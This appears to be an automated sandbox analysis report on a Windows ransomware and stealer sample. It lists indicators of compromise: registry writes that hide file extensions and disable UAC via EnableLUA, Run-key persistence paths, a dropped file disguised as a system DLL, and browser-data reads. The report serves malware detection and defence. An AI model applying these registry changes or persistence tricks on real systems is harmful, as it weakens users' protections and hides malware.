964918124532e636f209d522ca8cc1930528c1070e14775fa542c95cd465d5b5

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 04:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ff284a9fa89bfeb02e4ebab752065b79.exe
Size

119KB
MD5

ff284a9fa89bfeb02e4ebab752065b79
SHA1

d60b904d20f45602e109b69906b85b04f3530b37
SHA256

964918124532e636f209d522ca8cc1930528c1070e14775fa542c95cd465d5b5
SHA512

6b522bbc159048aa650ed37ade2829b238dc5f9f12265a78cc98742a3819cc9637ab77a5e1592d43c88e3fea48b8346b44f5b18535e881ac8fbc310b76837de0
SSDEEP

3072:ohehAzVNlWearrdQlJEdVw68e0tmynNXF0RzdnzgxbU3bh222222222T:6v34dQcdVw68Bt1nNm7zl9222222222T

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Renames multiple (86) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

UQwsoogU.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation UQwsoogU.exe
Executes dropped EXE 2 IoCs

Processes:

UQwsoogU.exeemsYwAII.exe

pid process

3688 UQwsoogU.exe
1140 emsYwAII.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	UQwsoogU.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

UQwsoogU.exeemsYwAII.exeff284a9fa89bfeb02e4ebab752065b79.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UQwsoogU.exe = "C:\\Users\\Admin\\psUMYAEE\\UQwsoogU.exe"	UQwsoogU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\emsYwAII.exe = "C:\\ProgramData\\JmQYYYko\\emsYwAII.exe"	emsYwAII.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UQwsoogU.exe = "C:\\Users\\Admin\\psUMYAEE\\UQwsoogU.exe"	ff284a9fa89bfeb02e4ebab752065b79.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\emsYwAII.exe = "C:\\ProgramData\\JmQYYYko\\emsYwAII.exe"	ff284a9fa89bfeb02e4ebab752065b79.exe

Drops file in System32 directory 2 IoCs

Processes:

UQwsoogU.exe

description ioc process

File created C:\Windows\SysWOW64\shell32.dll.exe UQwsoogU.exe
File opened for modification C:\Windows\SysWOW64\shell32.dll.exe UQwsoogU.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\SysWOW64\shell32.dll.exe	UQwsoogU.exe
File opened for modification	C:\Windows\SysWOW64\shell32.dll.exe	UQwsoogU.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

Processes:

pid	process
1512	reg.exe
3516	reg.exe
4900	reg.exe
4812	reg.exe
3604	reg.exe
1668	reg.exe
3280	reg.exe
4832	reg.exe
4660	reg.exe
4384	reg.exe
2364	reg.exe
2456	reg.exe
4316	reg.exe
436	reg.exe
3400	reg.exe
3208	reg.exe
3408	reg.exe
5004	reg.exe
4456	reg.exe
3908	reg.exe
4236	reg.exe
3064	reg.exe
688	reg.exe
1852	reg.exe
3984	reg.exe
1656	reg.exe
1604	reg.exe
2540	reg.exe
2372	reg.exe
404	reg.exe
3756	reg.exe
4496	reg.exe
2284	reg.exe
2488	reg.exe
2280	reg.exe
1800	reg.exe
2648	reg.exe
2168	reg.exe
5104	reg.exe
3184	reg.exe
4784	reg.exe
4648	reg.exe
2372	reg.exe
2488	reg.exe
4696	reg.exe
644	reg.exe
5116	reg.exe
1348	reg.exe
2364	reg.exe
2600	reg.exe
1668	reg.exe
3212	reg.exe
2236	reg.exe
4124	reg.exe
768	reg.exe
1620	reg.exe
4960	reg.exe
1320	reg.exe
5068	reg.exe
4332	reg.exe
1652	reg.exe
4544	reg.exe
4972	reg.exe
876	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exeff284a9fa89bfeb02e4ebab752065b79.exe

pid	process
4232	ff284a9fa89bfeb02e4ebab752065b79.exe
4232	ff284a9fa89bfeb02e4ebab752065b79.exe
4232	ff284a9fa89bfeb02e4ebab752065b79.exe
4232	ff284a9fa89bfeb02e4ebab752065b79.exe
2396	ff284a9fa89bfeb02e4ebab752065b79.exe
2396	ff284a9fa89bfeb02e4ebab752065b79.exe
2396	ff284a9fa89bfeb02e4ebab752065b79.exe
2396	ff284a9fa89bfeb02e4ebab752065b79.exe
3720	ff284a9fa89bfeb02e4ebab752065b79.exe
3720	ff284a9fa89bfeb02e4ebab752065b79.exe
3720	ff284a9fa89bfeb02e4ebab752065b79.exe
3720	ff284a9fa89bfeb02e4ebab752065b79.exe
4608	ff284a9fa89bfeb02e4ebab752065b79.exe
4608	ff284a9fa89bfeb02e4ebab752065b79.exe
4608	ff284a9fa89bfeb02e4ebab752065b79.exe
4608	ff284a9fa89bfeb02e4ebab752065b79.exe
4704	ff284a9fa89bfeb02e4ebab752065b79.exe
4704	ff284a9fa89bfeb02e4ebab752065b79.exe
4704	ff284a9fa89bfeb02e4ebab752065b79.exe
4704	ff284a9fa89bfeb02e4ebab752065b79.exe
4908	ff284a9fa89bfeb02e4ebab752065b79.exe
4908	ff284a9fa89bfeb02e4ebab752065b79.exe
4908	ff284a9fa89bfeb02e4ebab752065b79.exe
4908	ff284a9fa89bfeb02e4ebab752065b79.exe
4824	ff284a9fa89bfeb02e4ebab752065b79.exe
4824	ff284a9fa89bfeb02e4ebab752065b79.exe
4824	ff284a9fa89bfeb02e4ebab752065b79.exe
4824	ff284a9fa89bfeb02e4ebab752065b79.exe
2156	ff284a9fa89bfeb02e4ebab752065b79.exe
2156	ff284a9fa89bfeb02e4ebab752065b79.exe
2156	ff284a9fa89bfeb02e4ebab752065b79.exe
2156	ff284a9fa89bfeb02e4ebab752065b79.exe
856	ff284a9fa89bfeb02e4ebab752065b79.exe
856	ff284a9fa89bfeb02e4ebab752065b79.exe
856	ff284a9fa89bfeb02e4ebab752065b79.exe
